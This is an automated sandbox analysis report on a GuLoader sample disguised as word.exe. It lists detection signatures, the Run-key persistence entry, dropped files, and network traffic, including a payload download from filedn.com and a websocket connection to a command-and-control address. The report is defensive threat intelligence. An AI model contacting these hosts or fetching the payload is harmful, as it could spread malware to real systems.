Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
word.exe

Overview

General Information

Sample name:word.exe
Analysis ID:1497467
MD5:0ea4553778672b58bbd711fb039552c8
SHA1:8487f359428f19444696ce610ed81c6b4dd56a6a
SHA256:910ae266eb8177aa46e2a2c77029e57b30d7aaa819c3b8451514bf1b1ae26f8d
Infos:

Detection

GuLoader
Score:54
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected GuLoader
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Switches to a custom stack to bypass stack traces
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • word.exe (PID: 9140 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
    • word.exe (PID: 8792 cmdline: "C:\Users\user\Desktop\word.exe" MD5: 0EA4553778672B58BBD711FB039552C8)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\spherosome\preadoption\preembodiment\Unending.dieJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
    C:\Users\user\AppData\Local\Temp\nsh912A.tmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1794654590.0000000003100000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000015.00000002.5953667909.00000000016D0000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000000.00000002.1794245028.00000000028E0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\word.exe, ProcessId: 8792, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\Run
              Timestamp:2024-08-22T16:13:35.638517+0200
              SID:2803270
              Severity:2
              Source Port:49794
              Destination Port:443
              Protocol:TCP
              Classtype:Potentially Bad Traffic

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exeJoe Sandbox ML: detected
              Source: word.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00151B78 CryptQueryObject,21_2_00151B78
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00151B77 CryptQueryObject,21_2_00151B77
              Source: word.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: word.exeStatic PE information: certificate valid
              Source: unknownHTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
              Source: word.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00405FF5 FindFirstFileA,FindClose,0_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,0_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402645 FindFirstFileA,0_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00402645 FindFirstFileA,21_2_00402645
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00405FF5 FindFirstFileA,FindClose,21_2_00405FF5
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004055B1 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,21_2_004055B1
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015CB01h21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015CCA9h21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]21_2_00153265
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]21_2_0015255C
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015BB5Ch21_2_00154CE4
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then jmp 0015BB5Bh21_2_00154CE4
              Source: C:\Users\user\Desktop\word.exeCode function: 4x nop then mov eax, dword ptr [ebp-28h]21_2_00154CE4
              Source: global trafficHTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
              Source: Joe Sandbox ViewIP Address: 186.2.171.76 186.2.171.76
              Source: Joe Sandbox ViewJA3 fingerprint: c12f54a3f91dc7bafd92cb59fe009a35
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49794 -> 74.120.9.25:443
              Source: global trafficHTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownTCP traffic detected without corresponding DNS query: 186.2.171.76
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /lusLFydzKAeHl6DYixtUVg8/OdwulMHhYKs243.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: filedn.comCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /agent.ashx HTTP/1.1Host: 186.2.171.76Upgrade: websocketConnection: UpgradeSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==Sec-WebSocket-Version: 13Sec-WebSocket-Extensions: permessage-deflate; client_no_context_takeover
              Source: global trafficDNS traffic detected: DNS query: filedn.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundReferrer-Policy: no-referrerX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffContent-Security-Policy: default-src 'none'; script-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG'; img-src 'self'; style-src 'self' 'nonce-aaD1X7EAHdjb4ROQfLpG';Content-Type: text/html; charset=utf-8Content-Length: 2551ETag: W/"9f7-Mp+Fx3llRl+T15vdlmej7Jb+VGo"Set-Cookie: xid=e30=; path=/; samesite=lax; secure; httponlySet-Cookie: xid.sig=BzUgfgjtGT50YZcFx1QzksALeKi6x4FkK-W1U0iWT-1Ab08e5FW08ZvU_ej4h5aG; path=/; samesite=lax; secure; httponlyVary: Accept-EncodingDate: Thu, 22 Aug 2024 14:13:46 GMTConnection: close
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cert.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.cer0
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/
              Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/localhosthttp://localhost/7
              Source: word.exe, 00000015.00000002.5970737373.0000000007866000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificate.crt/localhostsihttp://localhost/o
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-RootCA-EV-RSA-4096-R2.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/SSLcom-SubCA-EV-CodeSigning-RSA-4096-R3.crl0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crls.ssl.com/ssl.com-rsa-RootCA.crl0
              Source: word.exe, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
              Source: word.exe, 00000000.00000000.860411221.0000000000409000.00000008.00000001.01000000.00000003.sdmp, word.exe, 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmp, word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0?
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsps.ssl.com0_
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashx
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashx$
              Source: word.exe, 00000015.00000002.5981319670.0000000037F50000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://186.2.171.76/agent.ashxP
              Source: word.exe, 00000015.00000002.5970737373.0000000007808000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmp, word.exe, 00000015.00000002.5981319670.0000000037E61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ssl.com/repository0
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownHTTPS traffic detected: 74.120.9.25:443 -> 192.168.11.20:49794 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 186.2.171.76:443 -> 192.168.11.20:49795 version: TLS 1.2
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040511A
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_00403217
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00403217 EntryPoint,#17,SetErrorMode,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,21_2_00403217
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004049590_2_00404959
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_004062CB0_2_004062CB
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0040495921_2_00404959
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_004062CB21_2_004062CB
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015B43C21_2_0015B43C
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_001516B121_2_001516B1
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015080821_2_00150808
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_0015089821_2_00150898
              Source: C:\Users\user\Desktop\word.exeCode function: 21_2_00154E1021_2_00154E10
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\Subhooked\Julenissen.exe 910AE266EB8177AA46E2A2C77029E57B30D7AAA819C3B8451514BF1B1AE26F8D
              Source: C:\Users\user\Desktop\word.exeCode function: String function: 004029FD appears 47 times
              Source: word.exe, 00000000.00000000.860475916.0000000000447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exe, 00000015.00000002.5953545481.0000000000447000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exe, 00000015.00000003.1793491825.000000003A7E1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametrichinization.exe4 vs word.exe
              Source: word.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal54.troj.evad.winEXE@3/10@1/2
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_0040442A GetDlgItem,SetWindowTextA,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,LdrInitializeThunk,SetDlgItemTextA,0_2_0040442A
              Source: C:\Users\user\Desktop\word.exeCode function: 0_2_00402036 LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,LdrInitializeThunk,0_2_00402036
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\spherosomeJump to behavior
              Source: C:\Users\user\Desktop\word.exeMutant created: \Sessions\1\BaseNamedObjects\MeshCentralAssistantSingletonMutex
              Source: C:\Users\user\Desktop\word.exeMutant created: NULL
              Source: C:\Users\user\Desktop\word.exeFile created: C:\Users\user\AppData\Local\Temp\nsh9129.tmpJump to behavior
              Source: word.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\word.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\word.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: C:\Users\user\Desktop\word.exeFile read: C:\Users\user\Desktop\word.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"
              Source: C:\Users\user\Desktop\word.exeProcess created: C:\Users\user\Desktop\word.exe "C:\Users\user\Desktop\word.exe"Jump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: edgegdi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ncryptprov.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: iconcodecservice.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: netfxperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: esentprf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfts.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: utildll.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msdtcuiu.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: atl.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msdtcprx.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: mtxclu.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: clusapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: resutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: msscntrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfdisk.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wmiclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfnet.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: browcli.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfos.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfproc.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: sysmain.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasctrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tapiperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: perfctrs.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: usbperf.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: tquery.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\word.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\word.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\word.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: word.exeStatic PE information: certificate valid
              Source: word.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.1794654590.0000000006E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
